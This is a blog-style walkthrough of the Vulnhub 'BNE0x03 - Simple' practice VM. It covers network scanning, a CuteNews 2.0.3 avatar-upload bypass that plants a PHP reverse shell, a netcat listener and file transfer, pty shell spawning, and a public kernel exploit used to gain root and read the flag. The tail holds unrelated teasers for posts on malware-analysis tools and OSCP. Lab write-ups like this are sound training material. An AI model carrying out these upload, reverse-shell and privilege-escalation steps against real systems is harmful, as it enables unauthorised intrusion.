Vulnhub: BNE0x03 - Simple

-
Vulnhub: BNE0x03 - Simple

VM can be downloaded here:
https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/

Sum:
As hint on vulnhub, normally reverse shell and Privilege Escalation on exploit-db

1. Identify target: (vmnet3 is base on which subnet machine is locate, could be eth0 or others)
$ arp-scan  --interface=vmnet3 --localnet
Interface: vmnet3, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.10.10.140 00:0c:29:53:94:f3 VMware, Inc.
10.10.10.141 00:0c:29:53:94:f3 VMware, Inc.
10.10.10.142 00:0c:29:8e:0e:32 VMware, Inc.
10.10.10.254 00:50:56:f5:e7:d2 VMware, Inc.

513 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 1.849 seconds (138.45 hosts/sec). 4 responded

140, 141 is target IP, 142 is attacker(Kali)

2. Nmap scan:
root@kali:~/Desktop# nmap -A 10.10.10.140

 Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-25 13:12 EDT
Nmap scan report for 10.10.10.140
Host is up (0.00053s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews
MAC Address: 00:0C:29:53:94:F3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

 TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 10.10.10.140

 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.10 seconds

Only port 80 is open

3. Web application:
Quickly notice this web application is base on CuteNews v.2.0.3

Which can found public exploit on here:
https://www.exploit-db.com/exploits/37474/

This is vulnerability file upload, which means we can upload our reverse shell to target machine.

So base on the step, 
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
   
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
*note: On step 5, also can use burpsuite to do it:
















after upload our shell, we can found on /uploads/ folder

setup nc listener and click the file:



4. Privilege Escalation:

first thing to do: spawn a shell:
- python -c 'import pty;pty.spawn("/bin/sh")'
- bash -i


Simply catch operating system version:

www-data@simple:/var/www/html$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

This version has many public exploit, I choose the following:
https://www.exploit-db.com/exploits/37292/

compile the source code:
root@kali:/var/www/html# gcc 37292.c -o 37292
37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
         if(unshare(CLONE_NEWUSER) != 0)
            ^
37292.c:111:17: warning: implicit declaration of function ‘clone’ [-Wimplicit-function-declaration]
                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL)
                 ^
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
             waitpid(pid, &status, 0);
             ^
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
     wait(NULL);
     ^

Upload to target using nc:
kali:
root@kali:/var/www/html# nc -nlvp 4444 < 37292
listening on [any] 4444 ...
connect to [10.10.10.142] from (UNKNOWN) [10.10.10.140] 45575
^C
root@kali:/var/www/html# 

Target:
nc 10.10.10.142 4444 > 37292
---------------------------------------------

Finally, 
chmod 777 37292
./37292
$ ./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Flag.txt
# cd root
# ls
flag.txt
# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!











留言

張貼留言

這個網誌中的熱門文章

惡意程式分析 - 常用工具篇

-
前言 工作的關係,最近接觸了一點 Malware跟逆向的東西,把常用的工具跟用途紀錄一下,怕以後自己忘記....希望能不定時更新  本篇會分為四個部分來記錄 執行環境 靜態分析 動態分析 以及最後的懶人包 執行環境 最常見的就是Windows,個人偏好用Windows 7 64 bits,很常見也可以裝很多東西,惡意程式大多都是針對Windows 而設計的 另一個很好用的執行環境是 REMnux, 裡面已經預載了很多常用的工具接下來會提到 連結可以參考這裏  https://remnux.org/  以及官方文檔  https://docs.remnux.org/ 靜態分析 顧名思義,不想執行惡意程式但想看看裡頭的內容,針對Windows的話可以用下列工具 PE Studio - 需要額外安裝。可以做初步的分析,同時可以知道是否有Anti-debug/analysis 阻擋著我們 IDA - 逆向標配,可以看assembly,同時也具有Debug功能 Ghidra PE Bear/ PE View - 可以針對PE檔案格式做深入研究 oledump.py - 針對Office格式(Word, Excel)分析裡面的Macro pdf-parser.py - 針對PDF格式分析裡面的Object 動態分析 靜態分析完了之後想驗證自己的想法,可以使用動態分析 動態分析方法比較多種,但大致可以分成自動跟手動, 本魯比較偷懶,比較常用自動分析 Cuckoo - 沙盒標配,資料相當完整,但偶而會被Anti-debug/analysis的招式抓到直接不執行 ANY.RUN - 最簡單就是丟到Cuckoo這類的沙盒,不過最近發現了個很好用且免費的工具,他可以直接跟沙盒內的Windows VM做互動。唯一缺點是只支援Windows平台 對於不屑用沙箱的逆向大神們,先受我一拜........ 喜歡手動的話,也是有些工具可以推薦 Process Hacker - 高配版工作管理員,記錄所有執行中的程式以及詳細內容 (Mutex, process handle.....) 一邊執行一邊看著,通常可以很好發現 Process Injection的特徵 Process Explorer - 記錄所有API usage,但建議搭配視覺化工具像...
閱讀完整內容

Offensive Security Certified Professional (OSCP) 滲透測試證照經驗分享

-
圖片
1. 前言 在資訊安全的證照中, 有許多證照以及課程可以學習 像是CEH, Security+, CISSP. 但真正以實作滲透測試為主的, OSCP算是最大宗. 在台灣並不算很出名...但在國外算是小有名氣的證照之一. 國外的分享數量非常多不在話下, 所以這篇文章將以中文做分享, 希望能藉此機會拋磚引玉一下 2. OSCP介紹與先修材料推薦 2.1 先修材料推薦 由於 OSCP 對修課者會有一定的要求, 有些人或許會好奇, 如何才知道自己是否準備好可以來上課了? 有些資源是我個人很推薦在上課之前可以先參考練習一下: https://www.vulnhub.com  (提供很多脆弱虛擬機可以下載來練習, 網路上很多人有分享解法, 可以一步一步學習依樣畫葫蘆) https://www.hackthebox.eu  (需要用官網提供的VPN進入他的 Lab環境, 跟OSCP Lab類似, 由於是免費的所以並沒有提供教材. 但是是很棒的資源. 他有個前提是要能夠破解官網註冊步驟) 2.2 課程簡介 Lab購買方式 官網是  https://www.offensive-security.com  , 要參與考試之前必須先上他們的線上課程, 課程大綱的網址如下:  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf 他的課程分為三種 (買lab同時會包含一次的考試, 單買考試是 一次60美金 以漲價變成150美金): Course + 30 days lab Course + 60 days lab Course + 90 days lab 詳細價格在 https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/ 可以發現其實差別只在lab天數. 不建議購買30天lab....因為有很大機會會沒有足夠時間做lab. 但是在購買過Course package後是可以單獨購買lab時數的. (很害羞的說我lab續了兩次, 因為小弟經驗不足實在破不完lab) 課程包括了PDF...
閱讀完整內容

Offensive Security Certified Professional Review

-
圖片
1. Introduction There are tons of certification in cybersecurity, for example, CEH, Security+, CISSP....but OSCP is known for its hands on experience and 24 hour exam. 2. Before OSCP.... 2.1 Material recommend There are some resource I would like to highlight before really step in OSCP's course. Although OSCP is the entry level cert in offsec, it still have lots knowledge Offsec expect people knows. Vulnhub: contain lots vulnerable machine, can download and do it locally https://www.vulnhub.com Hackthebox: Need VPN to their network, similar to OSCP's lab, really good resource before OSCP https://www.hackthebox.eu/ 2.2 Course Intro Official Sire is  https://www.offensive-security.com  , and before take exam, need to take their PWK course, here is syllabus  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf Course have three types: Course + 30/60/90 days lab, can be found here: https://www.offensive-security.com/information-s...
閱讀完整內容